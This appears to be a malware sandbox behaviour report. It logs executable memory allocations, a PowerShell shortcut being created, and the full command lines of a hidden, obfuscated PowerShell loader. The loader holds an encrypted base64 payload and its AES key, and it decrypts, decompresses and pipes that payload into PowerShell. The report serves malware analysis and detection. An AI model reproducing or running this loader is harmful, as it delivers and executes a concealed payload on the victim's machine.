NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02669000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05100000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05101000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05102000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05103000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05104000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05105000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05106000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05107000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05108000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05109000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0510a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0510b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0510c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0510d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0510e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0510f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05110000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05111000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05112000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (6 events)

cmdline	powershell.exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $Ibhr = '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';$ynfvCucL = 'R0piaVFud0pweHlla0R6cHVqcEV5QnpobmZYdkV5UGg=';$wHuBLdg = New-Object 'System.Security.Cryptography.AesManaged';$wHuBLdg.Mode = [System.Security.Cryptography.CipherMode]::ECB;$wHuBLdg.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$wHuBLdg.BlockSize = 128;$wHuBLdg.KeySize = 256;$wHuBLdg.Key = [System.Convert]::FromBase64String($ynfvCucL);$VaVjY = [System.Convert]::FromBase64String($Ibhr);$rXaMmEYL = $VaVjY[0..15];$wHuBLdg.IV = $rXaMmEYL;$oiEgKgyJf = $wHuBLdg.CreateDecryptor();$SxPDGLzVD = $oiEgKgyJf.TransformFinalBlock($VaVjY, 16, $VaVjY.Length - 16);$wHuBLdg.Dispose();$BiPumZcr = New-Object System.IO.MemoryStream( , $SxPDGLzVD );$NxNSfxy = New-Object System.IO.MemoryStream;$JeEsnJwpr = New-Object System.IO.Compression.GzipStream $BiPumZcr, ([IO.Compression.CompressionMode]::Decompress);$JeEsnJwpr.CopyTo( $NxNSfxy );$JeEsnJwpr.Close();$BiPumZcr.Close();[byte[]] $PiONcl = $NxNSfxy.ToArray();$Larju = [System.Text.Encoding]::UTF8.GetString($PiONcl);$Larju \| powershell - }
cmdline	powershell.exe $Ibhr = 'AAAAAAAAAAAAAAAAAAAAAJNLwVViKLkEyLezDfy1u8Lxa4o0JNZRu1et2uMAay7eJ+8JTeudtHkgrU6+WRmca6O5BdHdgpfHwwAnIeTItnzi9d8fQV6SodpWWGtbNPnFHvaSRPZC2hQMRXpxRdAl7MM/9DA84eI2oVNAsWhBQ3Z9ppyurDuB1RIOBL0HHtLUc9TCaMkRMYnQgDZRs9jLzVQD0axM/vr0+DhCwMnW083dxECzaqkLkbnkPasKnqwgVZAFt047JZi4QgdNTutgRyXdbXgg/BEJ2cBgRMJhOvC73u2ASo1NdtSNNu51zGrJe7INItN4UapIT0CoqCOQvb2IGsLoOB9CzmrUOJoEiSrR76U5LhfVlev7maNn+EVy4EFw/Kfa3TDgSerXMhRYWo6lYp5tDrInObJ2YWOqylkcR/JqJBtTRFviTiiCL1IpCyBcblRqKzbIdGn1XozlyMxld62IKea7/nlviUtLLO/Y7+IboIr8EtP0mkW4nF6/fXlO0qevGEdHAhWgyYN0JpwjDOYNSWdokkA8gLOFBPFVeB2sDWZbmCNxFoUIZVl2wH/w8McKW4u2rIa9hVkeH9Eu4QKm5riFDLmgBM7WavM9/nKBQXjrkE1i93tzfoQ1t25P/3w5zx4LNU0I8ERnfc91wwtJ4E3fGyaG9+Vjsa5JMNFs368BNd9dA31nq36JSm7edVQvkyIJ6PGNyp42GO9F2SSJd+rN++7AVWwHvsUHtfe/4MG58iy0J41FLLSmD/iLFoZdOOjvVIKbrSXy2gBPohuiEsWQ0yr5ig/SQLVOp/kzjYx5XrZpLK03nDdKVBmT0M7oL4V7HmMeLwK7dBqm3jje3kQY/ELUKuL/5A3Zylz338mb4Iyr3Ecsxkv9pd/ipN7KRAFL2xCHDdxx+0achJZYKdAtfGBUEhOZUfM8bPQZEMYPwjyCdVrLFvabxmdKax7sLzympyiP4fRxmZ8v7BLuxjgRZ1sWUEPymrZG0kerQ6m1apnwAoyjDYuy5cvbbPmFEmCvxQRy68hT3cVGnAEOE22GNQH3lm5TjoNi0o6spoowdqOULJBri9eD06/2dTUi9LJ7xs/Nm/OQ5MyAyseebn5609mX14BzQvDmZr86jTORp7UHRbpMQUR+HTIU/2FplQt+N57LgFT92MjDlaU26QSA9/rkpdinb2M4bM5Y4SsgeUpOuiplAj/sQS9vSVkxcYuZSrVtM4XzgS7L/xpF0lrqwe8MDyoF8mvlEyuiTMo1UQ+sc5fgsHaJCLEUGz4zMUtR8WKfMwXycgo3Ks0FpdUehuUlnNtO6RujyRr17Su0kevemhf6ntKYKuHCnt6pOV+Q0O169IpPXqob1A3PoSfyLZnyWvoOnNWgZLTjTSSrWLexcHKzxyR08/ll1QohWoSowRWJYRiwNGOOVclPCJcPx9YbrpWmDU+0EsMx6g1vQbNdz+KpSyNRT0GY37ItUIV5HUFYWt3wdDOp6QB7z3no4cYh8N972BDmVF/EFHKPsdXWlxgS7KXdplt3eqNfCv+uiYOANCl8EnTZlmHwVecPMFhdslUhhfnn7kgLMmMPBJi9Thkv9P/MGWXz5M0ha8AgZpF4kcWbsi/DaHeXtnzd2ZR1UYCdxhHXtCxnAgivr5M4B4iHNeVSDTihUtAd1ILEJvg2XkR90FI0GWWHexHMtS/2x0V5claBYdKY42RY8d5F0o1hZNuwfYeziesiFh405gTUcG73qI9QkkgQODp55b1lA0xUUU8ICFb3nY1ON8M3rfVmEbWY+f+CKZIbbJUM1yD6Yl7fP2FRDWRpCL/uEyz4y9RvIbOZ3Nbunr8i7A/7ESZJGh792iXbHr6VQY4zM7dgCYnYTEioEYe4Wz/qLKyTPY9qrdH/oy4lutR4j1ksslDsgcAG2NT/jhQx3wupzE0aV1rI1IWfFjJHzZPcYGrc7+9iYhadPUi7xwuADPih/kj3+sqYj4Ji61mFpO6jbhJ8pyqynKwuUyXKqaDWzxrwXXUQ/rOoM9DSVYDjEIreM3saYwRJy+qc0F1QtBafyfy9ujHbbK/QBnXszFfoY8NtWPoNOmeiedaFpPyNkKfhFN+mfeCgqcAmoxICWWtrHGPXSi2JI2dLQ/2U9QdmKxC+TFpDNpYnX3PVJ1kT9PVSb48ODBYfBwTRCenfSBTwJaOIxudkWv06b1Ds238hsAKtcmiMbJtWVRaC+Zlc+C3igMP2gisla+3lqWxoOi8mAchtujGVbUR6Joi7i1Pj4YabzUY4x0zx5vgmInOAQMYtoNuGcrwZwq/NFUslIVCA8qZC9LUqZlj4X/48DuBdM131mjBjtqpG5IFOHRExncpNYlrx9tCjfJ9VJytltFRk6pjr01Jd4MBdrkmMKtBQFwZGn49Q2uc0czH46F4o71pPD8m1GD13KG9r/5yZ0RDzANOPcg0mrJFLsM0E7B7zT/KS/fO5OHW9giihcPPscfFUkLNJ9T19A/TZQ9nq1flz+K+ROB0Di90SrJyQfw3u4ilO8Ke7ENRUP2J+thnU2blpQvuxpVwAQuYYHDVukslgg4gehX64dtAq7N/N/5Tn7600sW57WiEiiYBksKRLmTy+w1AJNOtJe222MWq8Ds5Xgscj483CpIu5sfI4x7qW3LTHA9GBP9TfbMVpveg5LJSnNde/vi3tNv2W4gmR91UP1ujLNC/V6rq0YzF/nbZURdpF/new2wW/K3lqZ//6xeQD1YJA7REgoMmcka1X0Ena7ydSWPh3uGIafcbR1gCbdd056jZWafikDjpJYAufnnX6YAJVfTzOUOtCm/PM0LQ+cY8XooHOULxmEFmdG1urf6NSpNwG84KQMDo68xkQEu7PmDrpxjl+iykDirinViCndIM3GE5mFdqI6JQJONanJ4JLELhgj4zmXnV7yy7xIl4D6fdbhSVRqup+PJja/VglR+ak9L9rDIpfEMzpum1sMjRjbC3fIzC4ak5b4lfJdXZPSDvhZI10lK/I9xgI6XIBnnsJudiYHoXmQ8QPRxbY7m7rJSqTqwCkdmYHoaisR4f4YxuLBQbYIJ2wMAKHY4dMZPY0h0l6/fmLBJpIgDMk04AgXSCzb2I5Q6892T+HNUa6LFjEHZUrUDf8eNhgKcJzs1zvL/W3rAfVD4eHP2v2lDRZPG9F//IHghaG/9+kyD2jYJEOL7pTSLJPejpGo5tt1qVwZ9FqnSwXbgAMrHAGxfvFx2WcODJLd5+4ETwBiZWngs7l6vcO956SBStL06+DUSAc4NM7HYPoFACrqbYvsyRLI9IifU/Fw6zcVORcsUIyKiI/mVxJ8ZPIIzVdjm7aGg1HKdzNNE2IR5HCw6aDprdMgFnlK67wWD3V6Q1Qp5kd5RiU8rT8iS/LMoLv3wQec2gZnbhwB8Nmn13ODTUNBviliuA/YgJUreHAMWkPX9NWs2AYgFPJmH7HCNpmg7eZDTY79mIek5h9pE2IBu3OYEkVyvSI47C+qeTtkRPMzdXN47iVkQlUAAVgQNWJtmcaa1LignhFRLAZiKpbhmGrv2X2pEboewxTdqsGsn6ZZ+d9SFMMIsauREdl1lLrVsErtEq5oCjDpZMNwv6Zbol057Y1pXVHteI35KlQmJaJk2yyzFpUrhTHSFCQh5y+XsNyQIOu1df5Bda5MftCTfCzyMymgf4rWcRAAhcKK0Wpe1SfZdauhXiZii687s3h7ygKk7esavBZcjNkMl104eSdAotnweMudkTI5iOvC2smkyMkMaVwUeqtb5+WFt/7ECUQTy+uViQCWuP5B4ILj58zFfXle1ltfAP7xiWtMtTKm8ejx0JsqE4P67052h9Ig4xR5UBv6JpkaSodzJjkY1CsPUo1Hzz645K4Yi85OjSDQyF3lDbP9K5N750GlaZC0pTrIrCh2uipFUMZEh71ELkBZp6D2pS+QyShaVfWnCMcY1adRfsFvhCL0RS48BOR2q/QjeiueSXcKTRf2BHQGMY/FUjWkSE7JBsEGNMgmABJWkj4nPCQ3sXe80jeVI7JW/XuCIzlRi35rVDpBIcAAvQKPgI6A+dqNZu+kPeOKFpRa1tKdtm/uHOkdVB9nrXdK90ptyHu2lI4k4PYgbZ6DhMZeQ5ofYqL/qPB3WPIz1qyS9MyrnDX+Pk13J+A/7/EtXZSBpK4tX7bX+nyDuOzqfwNPN+rUmAsisSLpVAxhBjTpUFcYo+/csQtelvOeu1dulGj36t9ZvXj2r9dNwEL0bWlglPeIawQsirYkh2NdPo690IdZHdd8zJZZLtSXw9c+Hill+FqhN1dRqI4tW+AV5FbnI546YGl9DWX9aQSwt6lEgsFee81oYAkYlGCYQXerJJ2VsD3uORrgt+NXHFUVO88mH4vdxy68ml9jmY68KB9ktbtRvCpAglahhY3+WcRLsXtuGvziHH814XK8+PMPcEVxA5OqH5vjnlYO0ST86E+uZNTC/4PrHITnc53gcifABKNJXq4LpvHiySAsbripkHX+Qj5j8ydbVmDeKu/++vRoKaL+W+zHuXUDVT+1dJygSKATg6sUUS7TpSMvftEBHE/+/zWbQexdtVBEVldJm46B4yIWL2pdA0U3JzNFORi5FdCC0fJwAQe3sHK4HxfWiCCV6egc5DxMQJEh8QN0K4NumNvg2G8/ytvqjqVHfKHWGkabTQql/9ZiWOPieDLpy9El/Y4YSxaJ8GRWGsVpdkDXFm16RkQhUCwD5BcQjt1GR4il1Is9aseJDcP6QdLzBXqaeeD0tZiL5SshOBXe8Vd6wKACSCBcmjE2534LfzCC6xSQwrr2iFhl29lXWd9MSktqtMef054DZ/J/L56sfmgWVwell7hqabtGWUZtx882ocnIyDLYKAVx97i217JG5BrrSq8KFY3V7Wi90naSw4V3QtKW2GZkQ7K5NpZ6L4DOq788OtzmO3/5DYzfoKFoZjvmuMDPjuvAPplz8v7HZ8m0L3AaC/XKd+uSrhyi7PzTLmxdG1rcjSPygCSBZgHAAX0gOmp1sfU470dA6wUU8grg/T35NwFuKqjsUVWoOuNB38nJyoCMLnC5PUjaySa2D2t+2XJV41g1wMRoUXkxpZyB9rwXttNNhohx/GIf70kCsJgpPg7v1+dl95wsSd3X/zaJdSyIzNzmAdhCvdIboT1xHYg2I3Iip+l6spO45cRmqdTXrXo57UTKTMq6k737C8bI++FclfRFlzYZCh5DzHa5VwTMvVTEg+97q7qAiOHHL/vhR6D6CjcBoKY/OshdEe8KJB07bjtLfzpKX+fKYXBli82pSc0tBd14PkMonKDWYyhdgep+ppaQvrZuOaH/fMZoodM5+JIwftgcJoItnbbJ2Gum7mCMLjE';$ynfvCucL = 'R0piaVFud0pweHlla0R6cHVqcEV5QnpobmZYdkV5UGg=';$wHuBLdg = New-Object 'System.Security.Cryptography.AesManaged';$wHuBLdg.Mode = [System.Security.Cryptography.CipherMode]::ECB;$wHuBLdg.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$wHuBLdg.BlockSize = 128;$wHuBLdg.KeySize = 256;$wHuBLdg.Key = [System.Convert]::FromBase64String($ynfvCucL);$VaVjY = [System.Convert]::FromBase64String($Ibhr);$rXaMmEYL = $VaVjY[0..15];$wHuBLdg.IV = $rXaMmEYL;$oiEgKgyJf = $wHuBLdg.CreateDecryptor();$SxPDGLzVD = $oiEgKgyJf.TransformFinalBlock($VaVjY, 16, $VaVjY.Length - 16);$wHuBLdg.Dispose();$BiPumZcr = New-Object System.IO.MemoryStream( , $SxPDGLzVD );$NxNSfxy = New-Object System.IO.MemoryStream;$JeEsnJwpr = New-Object System.IO.Compression.GzipStream $BiPumZcr, ([IO.Compression.CompressionMode]::Decompress);$JeEsnJwpr.CopyTo( $NxNSfxy );$JeEsnJwpr.Close();$BiPumZcr.Close();[byte[]] $PiONcl = $NxNSfxy.ToArray();$Larju = [System.Text.Encoding]::UTF8.GetString($PiONcl);$Larju
cmdline	powershell -
